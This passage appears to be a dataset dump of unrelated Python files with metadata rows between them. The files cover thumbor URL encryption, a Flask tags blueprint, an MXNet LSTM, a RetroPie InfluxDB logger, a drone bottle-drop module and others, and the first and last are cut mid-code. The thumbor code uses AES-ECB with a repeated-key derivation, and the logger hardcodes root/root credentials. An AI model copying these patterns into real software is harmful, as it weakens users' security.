logger.info(f'Image {fname} converted from {mimetype} to {media_object.file_type}')
return True
def remove_file(media_object):
fpath = media_object.file.path
try:
os.remove(fpath)
except Exception as e: # pragma: no cover
_msg = 'Media Hook remove_file: {} cannot be removed: {}'
logger.error(_msg.format(fpath, e))
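# --- sketch (editorial addition): sizing an in-memory buffer ---
# webp_image_optimizer() above measures the converted image with the same
# seek/tell idiom shown here on a plain buffer:
def _buffer_size(byte_io):
    byte_io.seek(0, os.SEEK_END)  # jump to the end of the stream
    size = byte_io.tell()         # the offset there equals the total bytes
    byte_io.seek(0)               # rewind for the next reader
    return size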
| 32.289855
| 91
| 0.609964
| 271
| 2,228
| 4.756458
| 0.332103
| 0.093871
| 0.069822
| 0.04422
| 0.035687
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003193
| 0.297127
| 2,228
| 68
| 92
| 32.764706
| 0.819923
| 0.041741
| 0
| 0
| 0
| 0
| 0.09526
| 0.011262
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.156863
| 0
| 0.254902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9cba2d718dc17bd9bd34864d1e448f3f16a9751
| 8,840
|
py
|
Python
|
tests/thumbor.py
|
hurbcom/libthumbor
|
8362f08071ed1ce345be59713825844808873a80
|
[
"MIT"
] | null | null | null |
tests/thumbor.py
|
hurbcom/libthumbor
|
8362f08071ed1ce345be59713825844808873a80
|
[
"MIT"
] | null | null | null |
tests/thumbor.py
|
hurbcom/libthumbor
|
8362f08071ed1ce345be59713825844808873a80
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
import base64
import hashlib
import hmac
import re
import six
from six.moves.urllib.parse import quote
from Crypto.Cipher import AES
class Url(object):
unsafe_or_hash = r'(?:(?:(?P<unsafe>unsafe)|(?P<hash>[^/]{28,}?))/)?'
debug = '(?:(?P<debug>debug)/)?'
meta = '(?:(?P<meta>meta)/)?'
trim = r'(?:(?P<trim>trim(?::(?:top-left|bottom-right))?(?::\d+)?)/)?'
crop = r'(?:(?P<crop_left>\d+)x(?P<crop_top>\d+):(?P<crop_right>\d+)x(?P<crop_bottom>\d+)/)?'
fit_in = r'(?:(?P<adaptive>adaptive-)?(?P<full>full-)?(?P<fit_in>fit-in)/)?'
dimensions = r'(?:(?P<horizontal_flip>-)?(?P<width>(?:\d+|orig))?x(?P<vertical_flip>-)?(?P<height>(?:\d+|orig))?/)?'
halign = r'(?:(?P<halign>left|right|center)/)?'
valign = r'(?:(?P<valign>top|bottom|middle)/)?'
smart = r'(?:(?P<smart>smart)/)?'
filters = r'(?:filters:(?P<filters>.+?\))/)?'
image = r'(?P<image>.+)'
compiled_regex = None
@classmethod
def regex(cls, has_unsafe_or_hash=True):
reg = ['/?']
if has_unsafe_or_hash:
reg.append(cls.unsafe_or_hash)
reg.append(cls.debug)
reg.append(cls.meta)
reg.append(cls.trim)
reg.append(cls.crop)
reg.append(cls.fit_in)
reg.append(cls.dimensions)
reg.append(cls.halign)
reg.append(cls.valign)
reg.append(cls.smart)
reg.append(cls.filters)
reg.append(cls.image)
return ''.join(reg)
@classmethod
def parse_decrypted(cls, url):
if cls.compiled_regex:
reg = cls.compiled_regex
else:
reg = cls.compiled_regex = re.compile(cls.regex(has_unsafe_or_hash=False))
result = reg.match(url)
if not result:
return None
result = result.groupdict()
int_or_0 = lambda value: 0 if value is None else int(value)
values = {
'debug': result['debug'] == 'debug',
'meta': result['meta'] == 'meta',
'trim': result['trim'],
'crop': {
'left': int_or_0(result['crop_left']),
'top': int_or_0(result['crop_top']),
'right': int_or_0(result['crop_right']),
'bottom': int_or_0(result['crop_bottom'])
},
'adaptive': result['adaptive'] == 'adaptive',
'full': result['full'] == 'full',
'fit_in': result['fit_in'] == 'fit-in',
'width': result['width'] == 'orig' and 'orig' or int_or_0(result['width']),
'height': result['height'] == 'orig' and 'orig' or int_or_0(result['height']),
'horizontal_flip': result['horizontal_flip'] == '-',
'vertical_flip': result['vertical_flip'] == '-',
'halign': result['halign'] or 'center',
'valign': result['valign'] or 'middle',
'smart': result['smart'] == 'smart',
'filters': result['filters'] or '',
'image': 'image' in result and result['image'] or None
}
return values
@classmethod
def generate_options(cls,
debug=False,
width=0,
height=0,
smart=False,
meta=False,
trim=None,
adaptive=False,
full=False,
fit_in=False,
horizontal_flip=False,
vertical_flip=False,
halign='center',
valign='middle',
crop_left=None,
crop_top=None,
crop_right=None,
crop_bottom=None,
filters=None):
url = []
if debug:
url.append('debug')
if meta:
url.append('meta')
if trim:
if isinstance(trim, bool):
url.append('trim')
else:
url.append('trim:%s' % trim)
crop = crop_left or crop_top or crop_right or crop_bottom
if crop:
url.append('%sx%s:%sx%s' % (
crop_left,
crop_top,
crop_right,
crop_bottom
))
if fit_in:
fit_ops = []
if adaptive:
fit_ops.append('adaptive')
if full:
fit_ops.append('full')
fit_ops.append('fit-in')
url.append('-'.join(fit_ops))
if horizontal_flip:
width = '-%s' % width
if vertical_flip:
height = '-%s' % height
if width or height:
url.append('%sx%s' % (width, height))
if halign != 'center':
url.append(halign)
if valign != 'middle':
url.append(valign)
if smart:
url.append('smart')
if filters:
url.append('filters:%s' % filters)
return '/'.join(url)
@classmethod
    def encode_url(cls, url):
return quote(url, '/:?%=&()~",\'')
class Cryptor(object):
def __init__(self, security_key):
if isinstance(security_key, six.string_types):
security_key = security_key.encode('utf-8')
self.security_key = (security_key * 16)[:16]
def encrypt(self,
width,
height,
smart,
adaptive,
full,
fit_in,
flip_horizontal,
flip_vertical,
halign,
valign,
trim,
crop_left,
crop_top,
crop_right,
crop_bottom,
filters,
image):
generated_url = Url.generate_options(
width=width,
height=height,
smart=smart,
meta=False,
adaptive=adaptive,
full=full,
fit_in=fit_in,
horizontal_flip=flip_horizontal,
vertical_flip=flip_vertical,
halign=halign,
valign=valign,
trim=trim,
crop_left=crop_left,
crop_top=crop_top,
crop_right=crop_right,
crop_bottom=crop_bottom,
filters=filters
)
url = "%s/%s" % (generated_url, hashlib.md5(image.encode('utf-8')).hexdigest())
pad = lambda b: b + (16 - len(b) % 16) * b"{"
        cipher = AES.new(self.security_key, AES.MODE_ECB)  # explicit mode; legacy PyCrypto defaulted to ECB
encrypted = base64.urlsafe_b64encode(cipher.encrypt(pad(url.encode('utf-8'))))
return encrypted.decode('utf-8')
def get_options(self, encrypted_url_part, image_url):
try:
opt = self.decrypt(encrypted_url_part)
except ValueError:
opt = None
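        # NOTE: the branch below assumes thumbor-handler attributes
        # (self.context, self.storage) that a bare Cryptor never defines;
        # it is only reachable when security_key is falsy.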
if not opt and not self.security_key and self.context.config.STORES_CRYPTO_KEY_FOR_EACH_IMAGE:
security_key = self.storage.get_crypto(image_url)
if security_key is not None:
cr = Cryptor(security_key)
try:
opt = cr.decrypt(encrypted_url_part)
except ValueError:
opt = None
if opt is None:
return None
image_hash = opt and opt.get('image_hash')
image_hash = image_hash[1:] if image_hash and image_hash.startswith('/') else image_hash
path_hash = hashlib.md5(image_url.encode('utf-8')).hexdigest()
if not image_hash or image_hash != path_hash:
return None
opt['image'] = image_url
opt['hash'] = opt['image_hash']
del opt['image_hash']
return opt
    def decrypt(self, encrypted):
        cipher = AES.new(self.security_key, AES.MODE_ECB)  # explicit mode; legacy PyCrypto defaulted to ECB
        debased = base64.urlsafe_b64decode(encrypted.encode('utf-8'))
        decrypted = cipher.decrypt(debased).rstrip(b'{').decode('utf-8')
        result = Url.parse_decrypted('/%s' % decrypted)
        if result is None:
            return None
        result['image_hash'] = result['image']
        del result['image']
        return result
class Signer:
def __init__(self, security_key):
if isinstance(security_key, six.string_types):
security_key = security_key.encode('utf-8')
self.security_key = security_key
def validate(self, actual_signature, url):
url_signature = self.signature(url)
return url_signature == actual_signature
def signature(self, url):
result = base64.urlsafe_b64encode(
hmac.new(self.security_key, url.encode('utf-8'), hashlib.sha1).digest())
return result.decode()
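A minimal usage sketch for the HMAC-signed path above; the security key and image URL are made-up values, and the layout mirrors how libthumbor-style clients compose final URLs.
options = Url.generate_options(width=300, height=200, smart=True)
path = '%s/%s' % (options, 'media/img/example.jpg')
signature = Signer('my-security-key').signature(path)
final_url = '/%s/%s' % (signature, path)  # '/<sig>/300x200/smart/media/img/example.jpg'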
| 30.801394
| 119
| 0.508145
| 972
| 8,840
| 4.447531
| 0.144033
| 0.050891
| 0.03331
| 0.016655
| 0.174185
| 0.141106
| 0.117511
| 0.103632
| 0.076336
| 0.054129
| 0
| 0.008764
| 0.354638
| 8,840
| 286
| 120
| 30.909091
| 0.748992
| 0.015385
| 0
| 0.135965
| 0
| 0.013158
| 0.126581
| 0.057714
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048246
| false
| 0
| 0.030702
| 0.004386
| 0.201754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9d237ae48e81118b5aaea91722859235e40aa06
| 1,599
|
py
|
Python
|
flaskrst/modules/tags.py
|
jarus/flask-rst
|
05b6a817f5986d6f6a4552d16a133deb8859ce3e
|
[
"BSD-3-Clause"
] | 7
|
2015-01-22T14:32:55.000Z
|
2021-07-14T02:54:42.000Z
|
flaskrst/modules/tags.py
|
jarus/flask-rst
|
05b6a817f5986d6f6a4552d16a133deb8859ce3e
|
[
"BSD-3-Clause"
] | null | null | null |
flaskrst/modules/tags.py
|
jarus/flask-rst
|
05b6a817f5986d6f6a4552d16a133deb8859ce3e
|
[
"BSD-3-Clause"
] | 2
|
2016-03-14T01:06:13.000Z
|
2016-04-15T13:26:54.000Z
|
# -*- coding: utf-8 -*-
"""
flask-rst.modules.tags
~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2011 by Christoph Heer.
:license: BSD, see LICENSE for more details.
"""
from math import log
from flask import Blueprint, render_template
from jinja2 import Markup
from flaskrst.modules.blog import posts
def get_tags():
tags = {}
for post in posts:
post_tags = [tag.lower() for tag in post.config.get('tags', [])]
for tag in post_tags:
if tag not in tags:
tags[tag] = 1
else:
tags[tag] += 1
return tags
def get_posts_by_tag(name):
posts_with_tag = []
for post in posts:
post_tags = [tag.lower() for tag in post.config.get('tags', [])]
for tag in post_tags:
if tag == name and post not in posts_with_tag:
posts_with_tag.append(post)
return posts_with_tag
def template_tags(doc):
tags = [tag.lower() for tag in doc.config.get('tags', [])]
return Markup(render_template('tags_inside_post.html', tags=tags))
tags = Blueprint('tags', __name__)
@tags.route("/tags/")
def cloud():
tags = get_tags()
for tag in tags:
tags[tag] = 100 + log(tags[tag] or 1) * 20
return render_template('tags_cloud.html',
tags=tags
)
@tags.route("/tags/<tag>/")
def tag(tag):
blog_posts = get_posts_by_tag(tag)
return render_template('tags_taged_with.html',
tag=tag,
blog_posts=blog_posts
)
def setup(app, cfg):
app.jinja_env.globals['tags'] = template_tags
app.register_blueprint(tags)
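A hypothetical standalone wiring, assuming the flaskrst templates and posts collection are importable; flask-rst itself calls setup() for each enabled module.
from flask import Flask

app = Flask(__name__)
setup(app, cfg={})  # registers the /tags/ cloud and /tags/<tag>/ listing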
| 26.213115
| 72
| 0.605378
| 225
| 1,599
| 4.124444
| 0.28
| 0.060345
| 0.051724
| 0.051724
| 0.201509
| 0.185345
| 0.163793
| 0.163793
| 0.163793
| 0.163793
| 0
| 0.011814
| 0.258912
| 1,599
| 61
| 73
| 26.213115
| 0.771308
| 0.09631
| 0
| 0.136364
| 0
| 0
| 0.066291
| 0.01481
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.090909
| 0
| 0.340909
| 0.068182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9d8ca7a24eddf8714bfa4046edd0feee39e2a38
| 1,283
|
py
|
Python
|
lib/core/network.py
|
lck1201/seq2seq-3Dpose
|
3f45cc0f001ac5d25705834541d55938bf1907b6
|
[
"MIT"
] | 13
|
2019-03-29T13:39:36.000Z
|
2021-09-07T11:15:45.000Z
|
lib/core/network.py
|
lck1201/seq2seq-3Dpose
|
3f45cc0f001ac5d25705834541d55938bf1907b6
|
[
"MIT"
] | 1
|
2019-12-14T21:12:17.000Z
|
2019-12-14T21:12:17.000Z
|
lib/core/network.py
|
lck1201/seq2seq-3Dpose
|
3f45cc0f001ac5d25705834541d55938bf1907b6
|
[
"MIT"
] | null | null | null |
import mxnet as mx
from mxnet import nd
from mxnet import gluon
from mxnet.gluon import nn, rnn
from config import config
nJoints = config.NETWORK.nJoints
class MyLSTM(gluon.Block):
def __init__(self, cfg, **kwargs):
super(MyLSTM, self).__init__(**kwargs)
self.hidden_dim = cfg.NETWORK.hidden_dim
with self.name_scope():
self.drop1 = nn.Dropout(cfg.NETWORK.dropout1)
self.drop2 = nn.Dropout(cfg.NETWORK.dropout2)
self.encoder = rnn.LSTMCell(hidden_size=self.hidden_dim, prefix='encoder_')
self.decoder = rnn.LSTMCell(hidden_size=self.hidden_dim, prefix='decoder_')
self.output_layer = nn.Dense(3*nJoints)
def forward(self, inputs, init_state, start_token):
state = init_state
for item in inputs:
mid_hidden, state = self.encoder(self.drop1(item), state)
# decoder
ins = start_token
        pred = []  # seqLength, 64x(3x16)
for i in range(config.DATASET.seqLength):
hidden_state, state = self.decoder(self.drop1(ins), state)
output = self.output_layer(self.drop2(hidden_state)) + ins
ins = output
pred.append(output)
return pred
def get_net(cfg):
return MyLSTM(cfg)
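A minimal smoke test, assuming config.NETWORK.hidden_dim and config.DATASET.seqLength are populated; the batch size and 2D-input width are illustrative guesses.
net = get_net(config)
net.initialize()
batch = 4
inputs = [nd.random.normal(shape=(batch, 2 * nJoints)) for _ in range(3)]
state = [nd.zeros((batch, net.hidden_dim)) for _ in range(2)]  # [h, c]
start_token = nd.zeros((batch, 3 * nJoints))
pred = net(inputs, state, start_token)  # seqLength outputs of (batch, 3*nJoints)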
| 36.657143
| 87
| 0.639127
| 165
| 1,283
| 4.806061
| 0.369697
| 0.045397
| 0.04918
| 0.047919
| 0.100883
| 0.100883
| 0.100883
| 0.100883
| 0
| 0
| 0
| 0.01367
| 0.258769
| 1,283
| 35
| 88
| 36.657143
| 0.820189
| 0.021044
| 0
| 0
| 0
| 0
| 0.012759
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.166667
| 0.033333
| 0.366667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9da6ebaaad2c77b2b6e79ec9dbb080561fa3b98
| 1,138
|
py
|
Python
|
day10/day10.py
|
ecly/a
|
73642e7edae484984430492ca9b62bd52b315a50
|
[
"MIT"
] | null | null | null |
day10/day10.py
|
ecly/a
|
73642e7edae484984430492ca9b62bd52b315a50
|
[
"MIT"
] | null | null | null |
day10/day10.py
|
ecly/a
|
73642e7edae484984430492ca9b62bd52b315a50
|
[
"MIT"
] | null | null | null |
import sys
def print_lights(lights):
x = [x for x,y in lights.keys()]
y = [y for x,y in lights.keys()]
minx, maxx = min(x), max(x)
miny, maxy = min(y), max(y)
if maxy - miny < 18:
result = []
for y in range(miny, maxy+1):
for x in range(minx, maxx+1):
result.append("#" if (x, y) in lights else ".")
result.append('\n')
return ''.join(result)
return False
def step(lights):
return {(x + vx, y + vy): (vx, vy) for (x, y), (vx, vy) in lights.items()}
def parse(line):
pos, vel = line[10:].strip().split("> velocity=<",)
posx, posy = [int(i) for i in pos.split(", ")]
velx, vely = [int(i) for i in vel[:-1].split(", ")]
return posx, posy, velx, vely
def main():
lights = {}
for line in sys.stdin.readlines():
posx, posy, velx, vely = parse(line)
lights[posx, posy] = (velx, vely)
for i in range(25000):
result = print_lights(lights)
if result:
print(result)
print(i)
break
lights = step(lights)
if __name__ == '__main__':
main()
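For reference, a hedged sample of the input format parse() expects (Advent of Code day 10); feed the real puzzle input on stdin.
# parse("position=< 9,  1> velocity=< 0,  2>") -> (9, 1, 0, 2)
# usage: python day10.py < input.txt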
| 23.708333
| 78
| 0.516696
| 164
| 1,138
| 3.52439
| 0.310976
| 0.027682
| 0.025952
| 0.051903
| 0.093426
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0.015424
| 0.316344
| 1,138
| 47
| 79
| 24.212766
| 0.727506
| 0
| 0
| 0
| 0
| 0
| 0.024605
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114286
| false
| 0
| 0.028571
| 0.028571
| 0.257143
| 0.114286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9dbe4020052218bd87d8a5c72620da1aa4c792c
| 1,850
|
py
|
Python
|
fuzzystring.py
|
ZackDev/fuzzystring
|
70d5e55f8cf90bcebdb491ba26baa3e05d479189
|
[
"MIT"
] | null | null | null |
fuzzystring.py
|
ZackDev/fuzzystring
|
70d5e55f8cf90bcebdb491ba26baa3e05d479189
|
[
"MIT"
] | null | null | null |
fuzzystring.py
|
ZackDev/fuzzystring
|
70d5e55f8cf90bcebdb491ba26baa3e05d479189
|
[
"MIT"
] | null | null | null |
import re
import random
import string
supported_types = ['a', 'n', 's']
def fuzzyfy(types, length):
# check type and length parameters for validity
try:
int(length)
except Exception:
return None
    if types == '':
return None
elif length < 1:
return None
for type in types:
try:
supported_types.index(type)
except Exception:
return None
    # count each requested type locally; a module-level list would keep
    # stale counts across calls and wrongly reject repeated invocations
    count_types = []
    for type in types:
type_occured = False
for counter in count_types:
if counter[0] == type:
counter[1] += 1
type_occured = True
if type_occured is False:
count_types.append([type, 1])
for counter in count_types:
if counter[1] > 1:
return None
# build fuzzy string
fuzzystr = str("")
for i in range(0, length):
fuzzystr += str(_type_to_char(random.choice(types)))
    # check fuzzy string for expected length
if len(fuzzystr) == length:
return fuzzystr
else:
return None
def _type_to_char(type):
# returns character for a given type
if type == "a":
return(random.choice(string.ascii_lowercase + string.ascii_uppercase))
elif type == "n":
return(random.choice(string.digits))
elif type == "s":
return(random.choice(string.punctuation))
else:
return str("")
def test():
print(fuzzyfy('ab', 2))
print(fuzzyfy('ans', 2))
print(fuzzyfy('', 0))
print(fuzzyfy('ans', 5))
print(fuzzyfy('xxansxx', 99))
print(fuzzyfy('ansans', 9))
print(fuzzyfy('ans', 'a'))
print(fuzzyfy('an', -1))
print(fuzzyfy('ans', 11))
print(fuzzyfy('an', 1))
print(fuzzyfy('san', 5))
if __name__ == '__main__':
s = fuzzyfy('ans', 10)
print(s)
| 22.02381
| 78
| 0.571351
| 230
| 1,850
| 4.486957
| 0.330435
| 0.127907
| 0.05814
| 0.069767
| 0.158915
| 0.158915
| 0.060078
| 0
| 0
| 0
| 0
| 0.017081
| 0.303784
| 1,850
| 83
| 79
| 22.289157
| 0.784161
| 0.074054
| 0
| 0.258065
| 0
| 0
| 0.030445
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048387
| false
| 0
| 0.064516
| 0
| 0.241935
| 0.193548
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e2dcad41a62fabe6d852cdc47cfde976426a83
| 1,510
|
py
|
Python
|
modules/drop.py
|
a-wing/mavelous
|
eef41c096cc282bb3acd33a747146a88d2bd1eee
|
[
"MIT"
] | 80
|
2015-01-02T23:23:19.000Z
|
2021-11-02T16:03:07.000Z
|
modules/drop.py
|
Y-H-T/mavelous
|
eef41c096cc282bb3acd33a747146a88d2bd1eee
|
[
"MIT"
] | 1
|
2016-04-13T15:44:23.000Z
|
2016-04-13T15:44:23.000Z
|
modules/drop.py
|
Y-H-T/mavelous
|
eef41c096cc282bb3acd33a747146a88d2bd1eee
|
[
"MIT"
] | 63
|
2015-01-03T19:35:39.000Z
|
2022-02-08T17:15:44.000Z
|
#!/usr/bin/env python
''' simple bottle drop module'''
import time
mpstate = None
hold_pwm = 983
release_pwm = 1776
drop_channel = 5
drop_time = 2.0
class drop_state(object):
def __init__(self):
self.waiting = False
self.start_drop = 0
def name():
'''return module name'''
return "drop"
def description():
'''return module description'''
return "bottle drop control"
def cmd_drop(args):
'''drop a bottle'''
mpstate.drop_state.start_drop = time.time()
mpstate.drop_state.waiting = True
mpstate.status.override[drop_channel-1] = release_pwm
mpstate.override_period.force()
print("started drop")
def check_drop(m):
'''check if drop is complete'''
if mpstate.drop_state.waiting and time.time() > mpstate.drop_state.start_drop+drop_time:
mpstate.status.override[drop_channel-1] = 0
mpstate.drop_state.waiting = False
mpstate.override_period.force()
print("drop complete")
def init(_mpstate):
'''initialise module'''
global mpstate
mpstate = _mpstate
mpstate.drop_state = drop_state()
mpstate.command_map['drop'] = (cmd_drop, "drop bottle")
print("drop initialised")
def mavlink_packet(m):
'''handle an incoming mavlink packet'''
if m.get_type() == 'RC_CHANNELS_RAW':
check_drop(m)
if m.get_type() == 'PARAM_VALUE':
if str(m.param_id) == 'RC5_FUNCTION' and m.param_value != 1.0:
print("DROP WARNING: RC5_FUNCTION=%u" % m.param_value)
| 26.491228
| 92
| 0.660265
| 204
| 1,510
| 4.676471
| 0.362745
| 0.075472
| 0.100629
| 0.072327
| 0.220126
| 0.069182
| 0
| 0
| 0
| 0
| 0
| 0.015113
| 0.211258
| 1,510
| 56
| 93
| 26.964286
| 0.785894
| 0.121192
| 0
| 0.052632
| 0
| 0
| 0.113178
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.184211
| false
| 0
| 0.026316
| 0
| 0.289474
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e532019c14012309cd048823903e390b14f730
| 3,767
|
py
|
Python
|
retropie/influx-retropie.py
|
Epaphus/personal-influxdb
|
6357bc8a1b362280b0ce79674ddd8e804573f2a9
|
[
"Apache-2.0"
] | 217
|
2020-01-07T20:25:46.000Z
|
2022-03-29T06:09:58.000Z
|
retropie/influx-retropie.py
|
Epaphus/personal-influxdb
|
6357bc8a1b362280b0ce79674ddd8e804573f2a9
|
[
"Apache-2.0"
] | 16
|
2020-02-10T12:40:23.000Z
|
2022-02-26T13:01:55.000Z
|
retropie/influx-retropie.py
|
Epaphus/personal-influxdb
|
6357bc8a1b362280b0ce79674ddd8e804573f2a9
|
[
"Apache-2.0"
] | 34
|
2020-01-15T15:42:20.000Z
|
2022-02-22T17:29:15.000Z
|
#!/usr/bin/python3
# Copyright (C) 2020 Sam Steele
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys
import xml.etree.ElementTree as ET
from datetime import datetime
from influxdb import InfluxDBClient
from influxdb.exceptions import InfluxDBClientError
INFLUXDB_HOST = 'localhost'
INFLUXDB_PORT = 8086
INFLUXDB_USERNAME = 'root'
INFLUXDB_PASSWORD = 'root'
GAMING_DATABASE = 'gaming'
f = open('/run/shm/influx-retropie', 'r')
start = datetime.utcfromtimestamp(int(f.readline().strip()))
platform = f.readline().strip()
emulator = f.readline().strip()
rom = name = os.path.basename(f.readline().strip())
end = datetime.utcfromtimestamp(int(f.readline().strip()))
duration = (end - start).seconds
f.close()
if not rom:
rom = name = emulator
platform = "Linux"
# Ignore games played less than 60 seconds
if duration < 60:
print("Ignoring '" + emulator + ": " + name +"' played less than 60 seconds")
sys.exit()
# Ignore non-games and the Macintosh platform, which doesn't provide game names
if platform == "macintosh" or rom.startswith("+") or rom == "Desktop.sh" or rom == "Kodi.sh" or rom == "Steam Link.sh":
print("Ignoring non-game: '" + emulator + ": " + name +"'")
sys.exit()
gamelist = os.path.expanduser('~/.emulationstation/gamelists/' + platform + '/gamelist.xml')
if os.path.exists(gamelist):
root = ET.parse(gamelist).getroot()
for game in root.findall('game'):
path = os.path.basename(game.find('path').text)
if path == name:
name = game.find('name').text
break
if platform == "nes":
platform = "NES"
elif platform == "snes":
platform = "SNES"
elif platform == "gba":
platform = "Game Boy Advance"
elif platform == "gbc":
platform = "Game Boy Color"
elif platform == "megadrive" or platform == "genesis":
platform = "Sega Genesis"
elif platform == "sega32x":
platform = "Sega 32X"
elif platform == "segacd":
platform = "Sega CD"
elif platform == "pc":
platform = "MS-DOS"
elif platform == "scummvm":
platform = "ScummVM"
elif platform == "mame-libretro":
platform = "Arcade"
elif platform == "mastersystem":
platform = "Sega MasterSystem"
else:
platform = platform.capitalize()
url = ""
image = ""
if name == "openttd":
name = "OpenTTD"
url = "https://www.openttd.org"
image = "https://www.openttd.org/static/img/layout/openttd-128.gif"
if url and image:
points = [{
"measurement": "time",
"time": start,
"tags": {
"application_id": rom,
"platform": platform,
"title": name,
},
"fields": {
"value": duration,
"image": image,
"url": url
}
}]
else:
points = [{
"measurement": "time",
"time": start,
"tags": {
"application_id": rom,
"platform": platform,
"title": name,
},
"fields": {
"value": duration
}
}]
try:
client = InfluxDBClient(host=INFLUXDB_HOST, port=INFLUXDB_PORT, username=INFLUXDB_USERNAME, password=INFLUXDB_PASSWORD)
client.create_database(GAMING_DATABASE)
except InfluxDBClientError as err:
print("InfluxDB connection failed: %s" % (err))
sys.exit()
try:
client.switch_database(GAMING_DATABASE)
client.write_points(points)
except InfluxDBClientError as err:
print("Unable to write points to InfluxDB: %s" % (err))
sys.exit()
print("Successfully wrote %s data points to InfluxDB" % (len(points)))
| 27.297101
| 123
| 0.689673
| 487
| 3,767
| 5.301848
| 0.418891
| 0.046476
| 0.027111
| 0.012393
| 0.149497
| 0.10457
| 0.072812
| 0.072812
| 0.072812
| 0.072812
| 0
| 0.008267
| 0.165118
| 3,767
| 137
| 124
| 27.49635
| 0.812719
| 0.182373
| 0
| 0.264151
| 0
| 0
| 0.236542
| 0.017618
| 0.009434
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.018868
| 0.04717
| 0
| 0.04717
| 0.04717
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e56f5f70dd474993a40687a674f32c37bed1cb
| 7,470
|
py
|
Python
|
molecule.py
|
Ved-P/molecule
|
9727a9e7f8c0412feee27bbe034a1540cff7534e
|
[
"MIT"
] | null | null | null |
molecule.py
|
Ved-P/molecule
|
9727a9e7f8c0412feee27bbe034a1540cff7534e
|
[
"MIT"
] | 1
|
2022-01-03T20:07:31.000Z
|
2022-01-04T18:45:21.000Z
|
molecule.py
|
Ved-P/molecule
|
9727a9e7f8c0412feee27bbe034a1540cff7534e
|
[
"MIT"
] | null | null | null |
# Molecule
#
# This program takes in a molecular formula and creates a Lewis diagram and a 3D
# model of the molecule as the output.
#
# Author: Ved Pradhan
# Since: December 31, 2021
import json
import matplotlib.pyplot as plt
import sys
import math
# Opens the JSON file for use.
with open("elements.json", "r", encoding="utf8") as file:
data = json.load(file)
# Gets the formula and charge from the user.
formula = input("\n\n\nWelcome to Molecule! Please enter a molecular formula "
+ "(case sensitive): ")
temp = input("What is the charge of the molecule? Enter an integer (0 for no "
+ "charge): ")
try:
charge = int(temp)
except ValueError:
print("Error: '" + temp + "' is not a valid charge.\n\n\n")
sys.exit()
# A list to store each individual atom in the molecule.
atoms = []
# A dictionary to store each type of element and its frequency.
element_frequency = {}
# A list to store the bonds between Atom objects.
bonds = []
# Class to represent each individual atom in the molecule.
class Atom:
def __init__(self, symbol):
self.symbol = symbol
self.element = get_element(symbol)
        if self.element is not False:
self.enegativity = self.element["electronegativity_pauling"]
self.expected_ve = self.get_valence_electrons()
self.loose_ve = 0
self.sigma_bonds = 0
self.pi_bonds = 0
self.formal_charge = 0
self.total_ve = 0
self.lewis_x = 0
self.lewis_y = 0
# Returns the number of valence electrons the atom is expected to have.
def get_valence_electrons(self):
if self.symbol == "He":
return 2
